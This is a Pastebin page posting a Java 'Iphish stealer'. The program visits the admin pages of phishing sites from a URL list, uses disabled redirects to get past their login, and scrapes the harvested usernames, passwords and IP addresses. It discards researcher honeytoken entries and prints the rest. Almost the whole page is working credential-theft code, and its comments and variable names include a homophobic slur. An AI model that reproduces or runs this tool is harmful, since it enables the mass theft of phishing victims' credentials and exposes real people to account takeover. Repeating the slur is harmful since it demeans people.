API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Sep 26th, 2017
80
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.69 KB | None | 0 0
raw download clone embed print report
  1. import java.io.*;
  2. import java.net.*;
  3. import java.util.HashMap;
  4. import java.util.Map;
  5.  
  6. public class Stealer
  7. {//Iphish stealer - do not rerelease
  8.  
  9. public static void main(String[] args)
  10. {
  11. new Stealer();
  12. }
  13.  
  14. public Stealer()
  15. {
  16. //initAccs();
  17. initStealer();
  18. System.out.println("total users stolen "+usersStolen);
  19. System.out.println("total fags filtered "+fagsfiltered);
  20. System.out.println("actual users "+(usersStolen-fagsfiltered));
  21. }
  22. HashMap<String, Boolean> nameMap = new HashMap<String, Boolean>();
  23. private int usersStolen = 0;
  24. private int fagsfiltered = 0;
  25. public void initAccs()
  26. {
  27. try{
  28. FileInputStream fstream = new FileInputStream("accs.txt");
  29. DataInputStream in = new DataInputStream(fstream);
  30. BufferedReader br = new BufferedReader(new InputStreamReader(in));
  31. String strLine;
  32. while ((strLine = br.readLine()) != null) {
  33. nameMap.put(strLine, true);
  34. }
  35. in.close();
  36. }catch (Exception e){
  37. System.err.println("Error: " + e.getMessage());
  38. }
  39. }
  40.  
  41. public void initStealer()
  42. {
  43. String strLine="";
  44. try{
  45. FileInputStream fstream = new FileInputStream("urls.txt");
  46. DataInputStream in = new DataInputStream(fstream);
  47. BufferedReader br = new BufferedReader(new InputStreamReader(in));
  48.  
  49. while ((strLine = br.readLine()) != null) {
  50. if(!strLine.startsWith("#"))
  51. if(strLine.endsWith("/"))
  52. strLine=strLine+"admin/accs.php";
  53. stealForUrl(strLine);
  54. }
  55. in.close();
  56. }catch (Exception e){
  57. e.printStackTrace();
  58. System.err.println("Error: " + e.getMessage()+" "+strLine);
  59. }
  60. }
  61.  
  62.  
  63.  
  64. public void stealForUrl(String urllink)
  65. {
  66.  
  67. // Disable automatic redirects for all HTTP requests
  68. HttpURLConnection.setFollowRedirects(false);
  69.  
  70. // Disable automatic redirects for a particular connection
  71. try {
  72. // Create a URLConnection object for a URL
  73. String accPage = urllink;
  74. URL url = new URL(accPage);
  75. URLConnection conn = url.openConnection();
  76. System.out.println("Connecting to "+accPage);
  77. // Disable automatic redirects just for this connection
  78. HttpURLConnection httpConn = (HttpURLConnection)conn;
  79. httpConn.setInstanceFollowRedirects(false);
  80. System.out.println("Bypassing login");
  81.  
  82. // Send the request to the server
  83. conn.connect();
  84. System.out.println("Grabbing user data");
  85.  
  86. HashMap<Integer, String> lineMap = new HashMap<Integer, String>();
  87.  
  88. int endId = 0;
  89. BufferedReader rd = new BufferedReader(new InputStreamReader(conn.getInputStream()));
  90. String line;
  91. while((line = rd.readLine()) != null)
  92. {//some of the older phishers have the line at the beginning
  93. //this script needs to be modified to start at the end of <td>
  94. //DONE
  95. if((line.indexOf("<td>")>0) && (!(line.indexOf("javascript")>0)) )
  96. {//some wierd pages use a <td> on its own to break some shit
  97. try{
  98. line = line.substring(line.indexOf("<td>")+4);
  99. line = line.substring(0,line.length()-5);
  100. lineMap.put(endId++, line);
  101. }catch(Exception e){}//some broken page
  102. }
  103. }
  104. usersStolen += endId/3;
  105. System.out.println((endId/3)+" Users Stolen");
  106. int currentId = 0;
  107. while(currentId != endId)
  108. {
  109.  
  110. String username = lineMap.get(currentId++);
  111. boolean herp = false;
  112. try{
  113. herp = nameMap.get(username);
  114. }
  115. catch(Exception e){herp = false;}
  116. if(!herp)
  117. {
  118. String password = lineMap.get(currentId++);
  119. String ip = lineMap.get(currentId++);
  120. //todo make some kinda hashtable for this..
  121. //filter out the bullshit:3
  122. if(username.contains("/etc/passwd")||password.contains("/etc/passwd")||ip.contains("/etc/passwd")||username.contains("TESTINPUT")||password.contains("TESTINPUT")||ip.contains("TESTINPUT")||username.contains("g00dPa$$w0rD")||ip.contains("g00dPa$$w0rD")||username.contains("?")||password.length()>20||username.equalsIgnoreCase("")||username.contains("|")||username.contains("*")||username.contains("!")||username.contains("(")||username.contains(")")||username.contains("=")||username.contains("TROLOLOLOL")||password.contains("g00dPa$$w0rD")||password.equalsIgnoreCase("92.5.151.234")||ip.contains("92.5.151.234")||username.contains("92.5.151.234"))
  123. {fagsfiltered++;
  124. //System.out.println("acunetixfag filtered");
  125. }
  126. else
  127. {
  128. System.out.println("Username : "+username);
  129. System.out.println("Password : "+password);
  130. System.out.println("IPaddress: "+ip);
  131. System.out.println();
  132. }
  133. }
  134. else
  135. currentId+=2;
  136. }
  137.  
  138. } catch (MalformedURLException e) {
  139. } catch (IOException e) {
  140. if(e.getMessage().equalsIgnoreCase("Connection timed out: connect"))
  141. System.out.println("HOST IS DOWN");
  142. }
  143. }
  144.  
  145. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!